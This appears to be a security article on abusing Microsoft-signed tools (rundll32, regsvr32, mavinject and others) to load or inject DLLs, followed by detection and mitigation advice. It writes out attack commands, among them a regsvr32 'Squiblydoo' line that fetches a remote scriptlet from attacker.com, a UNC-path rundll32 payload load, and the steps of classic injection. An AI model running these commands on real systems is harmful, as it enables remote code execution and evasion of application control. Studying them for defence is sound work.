Load and Inject Malicious DLL Using Microsoft Tools

Introduction

Dynamic Link Library (DLL) injection is a technique used by attackers to execute malicious code within the address space of another process. What makes this technique particularly dangerous is that attackers can leverage legitimate, Microsoft-signed tools to perform the injection, making detection extremely difficult.

Living Off the Land Binaries (LOLBins)

The concept of "Living off the Land" refers to using legitimate system tools for malicious purposes. Several Microsoft-signed binaries can be abused to load arbitrary DLLs:

Rundll32.exe

The most well-known DLL loading mechanism. Rundll32 is designed to load and execute DLL functions:

rundll32.exe malicious.dll,EntryPoint

While commonly monitored, attackers use various obfuscation techniques to evade detection: - Using UNC paths: rundll32.exe \\attacker\share\payload.dll,Start - JavaScript execution: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication"

Regsvr32.exe

Originally designed for COM object registration, Regsvr32 can load and execute arbitrary DLLs and even remote scripts:

regsvr32.exe /s /n /u /i:http://attacker.com/payload.sct scrobj.dll

This technique, known as "Squiblydoo", allows execution of remote scriptlets while bypassing AppLocker.

Mavinject.exe

A lesser-known Microsoft tool that can inject DLLs into running processes:

mavinject.exe <PID> /INJECTRUNNING <path_to_dll>

This tool is signed by Microsoft and present on default Windows installations, making it an attractive option for attackers.

Other Abusable Binaries

• Msiexec.exe: Can execute DLLs embedded in MSI packages
• Odbcconf.exe: Can load arbitrary DLLs through response files
• Certutil.exe: Can download and decode DLLs from remote locations
• Mshta.exe: Can execute HTA files that load DLLs

Injection Techniques

Classic DLL Injection

1. Open the target process with OpenProcess()
2. Allocate memory in the target with VirtualAllocEx()
3. Write the DLL path with WriteProcessMemory()
4. Create a remote thread with CreateRemoteThread() pointing to LoadLibrary()

Reflective DLL Injection

A more advanced technique where the DLL maps itself into memory without using the Windows loader:

• No file on disk required
• No LoadLibrary() call
• Harder to detect with traditional tools
• Used by Metasploit, Cobalt Strike, and other frameworks

DLL Search Order Hijacking

Rather than injecting into a running process, attackers can place a malicious DLL in a location where a legitimate application will load it first:

• Application directory takes precedence over System32
• Missing DLLs can be planted
• Side-loading exploits signed applications

Detection and Mitigation

Detection Strategies

1. Monitor LOLBin execution: Alert on unusual command-line parameters for rundll32, regsvr32, etc.
2. Track DLL loads: Use Sysmon Event ID 7 to monitor image loads
3. Analyze process relationships: DLLs loaded by unusual parent processes are suspicious
4. Monitor for remote DLL loading: Network connections from DLL loading utilities

Mitigation Measures

1. Application Control: Use Windows Defender Application Control (WDAC) or AppLocker
2. Code Integrity: Enable Hypervisor-protected Code Integrity (HVCI)
3. Block LOLBins: Restrict execution of unnecessary system utilities
4. Enable Credential Guard: Prevents certain injection techniques
5. Keep systems patched: Many injection techniques exploit known vulnerabilities

Conclusion

The abuse of legitimate Microsoft tools for DLL injection represents a growing threat. Defenders must understand these techniques and implement layered defenses that go beyond simple signature-based detection. Monitoring for behavioral anomalies in system utility usage is key to detecting these attacks.